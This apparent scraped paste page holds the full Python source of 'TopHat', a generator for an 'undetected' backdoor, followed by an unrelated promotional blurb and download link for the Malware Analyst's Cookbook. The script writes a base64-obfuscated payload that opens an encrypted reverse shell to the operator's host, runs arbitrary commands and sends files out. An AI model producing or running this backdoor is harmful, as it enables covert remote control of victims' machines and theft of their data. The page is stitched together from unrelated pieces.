Leaderboard

_____ _ _ _ |_ _|__ _ __ | | | | __ _| |_ | |/ _ \| '_ \| |_| |/ _` | __| | | (_) | |_) | _ | (_| | |_ |_|\___/| .__/|_| |_|\__,_|\__| |_| Description: TopHat is a inspired by metasploits capabilties of meterpreter however i have coded a script to generate a - undetected encrypted backdoor using python. Usage: ./TopHat <lhost> <lport> Download TopHat.py Mirror: #!/usr/bin/python # -*- coding: utf-8 -*- import socket import os import sys import time import base64 from Crypto.PublicKey import RSA from Crypto.PublicKey import RSA from subprocess import check_output if len(sys.argv) == 3: addresser = sys.argv[1] porterica = sys.argv[2] else: print """ _____ _ _ _ |_ _|__ _ __ | | | | __ _| |_ | |/ _ \| '_ \| |_| |/ _` | __| | | (_) | |_) | _ | (_| | |_ |_|\___/| .__/|_| |_|\__,_|\__| |_| Description: TopHat is a inspired by metasploits capabilties of meterpreter however i have coded a script to generate a - undetected encrypted backdoor using python. Usage: ./TopHat <lhost> <lport> """ sys.exit() print "[*] Generating SSL Certificates" time.sleep(3) #Generate new key that's 4096 bits long new_key = RSA.generate(4096) #Export the key in PEM format public_key = new_key.publickey().exportKey("PEM") private_key = new_key.exportKey("PEM") backdoor_code_ot = """ import socket import subprocess import os from Crypto.PublicKey import RSA def encrypt(message): publickey = '''""" + public_key + """''' encryptor = RSA.importKey(publickey) encryptedData = encryptor.encrypt(message, 0) return encryptedData[0] def decrypt(cipher): privatekey = '''""" + private_key + """''' decryptor = RSA.importKey(privatekey) return decryptor.decrypt(cipher) def transfer(s,path): if os.path.exists(str(path)): f = open(path, 'rb') packet = f.read(1024) while packet != '': s.send(packet) packet = f.read(1024) s.send('DONE') f.close() else: s.send('File not found') def connect(): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(('""" + addresser + """',""" + porterica + """)) while True: command = decrypt(s.recv(1024)) if 'exit' in command: s.close() break if 'grab' in command: grab, path = command.split('*') try: transfer(s, path) except Exception, e: s.send(str(e)) pass else: CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) result = CMD.stdout.read() if len(result) > 512: for i in range(0, len(result), 512): chunk = result[0+i:512+i] s.send(encrypt(chunk)) else: s.send(encrypt(result)) #s.send(encrypt(CMD.stderr.read())) def main(): connect() if __name__ == '__main__': main() """ backerraka = base64.b64encode(backdoor_code_ot) backdoor_code = "import base64, sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('" + backerraka + "')))" def encrypt(message): publickey = public_key encryptor = RSA.importKey(publickey) encryptedData = encryptor.encrypt(message, 0) return encryptedData[0] def decrypt(cipher): privatekey = private_key decryptor = RSA.importKey(privatekey) return decryptor.decrypt(cipher) def transfer(conn, command): conn.send(command) f = open('/root/Desktop/somefile', 'wb') while True: bits = conn.recv(1024) if 'File not found' in bits: print '[-] File not found' break if bits.endswith('DONE'): print '[-] File transfer complete' f.close() break f.write(bits) f.close() def connect(): print "[*] Creating Backdoor..." liag = open("backdoor.py","w") liag.write(backdoor_code) liag.close() print "[*] Started reverse handler on %s:%s" % (addresser,porterica) print "[*] Starting the payload handler..." s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind((addresser,int(porterica))) s.listen(1) conn, addr = s.accept() print '[*] TopHat session 1 opened %s:%s -> %s\n' % (addresser,porterica,addr) while True: store = '' command = raw_input("tophat > ") command = encrypt(command) if 'exit' in command: #Send terminate signal to the client conn.send('exit') #Close the connection to the client on the server end conn.close() sys.exit() if 'grab' in command: transfer(conn, command) else: conn.send(command) result = conn.recv(1024) if len(decrypt(result)) == 512: store = store + decrypt(result) result = conn.recv(512) store = store + decrypt(result) else: print decrypt(result) def main(): connect() if __name__ == '__main__': main() Source: pastebin.com

Download pdf:https://repo.zenk-security.com/Virus-Infections-Detections-Preventions/Malware Analyst's Cookbook.pdf Source code examples:https://github.com/mgoffin/malwarecookbook/blob/master/README.md With our ever-increasing reliance on computers comes anever-growing risk of malware. Security professionals will findplenty of solutions in this book to the problems posed by viruses,Trojan horses, worms, spyware, rootkits, adware, and other invasivesoftware. Written by well-known malware experts, this guide revealssolutions to numerous problems and includes a DVD of customprograms and tools that illustrate the concepts, enhancing yourskills. Security professionals face a constant battle against malicioussoftware; this practical manual will improve your analyticalcapabilities and provide dozens of valuable and innovativesolutions Covers classifying malware, packing and unpacking, dynamicmalware analysis, decoding and decrypting, rootkit detection,memory forensics, open source malware research, and much more Includes generous amounts of source code in C, Python, and Perlto extend your favorite tools or build new ones, and customprograms on the DVD to demonstrate the solutions Malware Analyst's Cookbook is indispensible to ITsecurity administrators, incident responders, forensic analysts,and malware researchers. From the Back Cover Powerful, step-by-step solutions to dozens of common threats We called this a cookbook because each "recipe" presents boththe ingredients and the steps you take to resolve a specificproblem or research a given threat. On the DVD, you'll findsupporting files and original programs that provide additionalresources. You'll learn how to analyze malware using tools writtenby the authors as well as hundreds of other publicly availabletools. If your job involves incident response, computer forensics,systems security, or antivirus research, this book will becomeinvaluable to you. Learn to conduct online investigations without revealing youridentity Use honeypots to collect malware being distributed by bots andworms Analyze JavaScript, PDFs, and Office documents for suspiciouscontent Build a low-budget malware lab with virtualization or bare boneshardware Reverse engineer common encoding and encryption algorithms Set up an advanced memory forensics platform for malwareanalysis Investigate prevalent threats such as Zeus, Silent Banker,CoreFlood, Conficker, Virut, Clampi, Bankpatch, BlackEnergy, andmany more! On the DVD Use the files on the DVD to follow along with the recipes or toconduct your own investigations and analyses. You will find: Evidence files Annotated videos Source code Windows and Linux tools Over 50 original programs in Python, C/C++, and Perl "The most useful technical security book I've read this year. Amust-have for all who protect systems from malicioussoftware." —Lenny Zeltser, Security Practice Director at Savvisand Senior Faculty Member at SANS Institute "The ultimate guide for anyone interested in malwareanalysis." —Ryan Olson, Director, VeriSign iDefense RapidResponse Team "Every page is filled with practical malware knowledge,innovative ideas, and useful tools. Worth its weight ingold!" —AAron Walters, Lead Developer of Volatility and VP ofSecurity R&D at Terremark About the Author Michael Hale Ligh is a malicious code analyst at VerisigniDefense and Chief of Special Projects at MNIN Security. Steven Adair is a member of the Shadowserver Foundationand frequently analyzes malware and tracks botnets. He alsoinvestigates cyber attacks of all kinds with an emphasis on thoselinked to cyber espionage. Blake Hartstein is the author of multiple security toolsand a Rapid Response Engineer at Verisign iDefense, where heresponds to malware incidents. Matthew Richard has authored numerous security tools andalso ran a managed security service for banks and creditunions.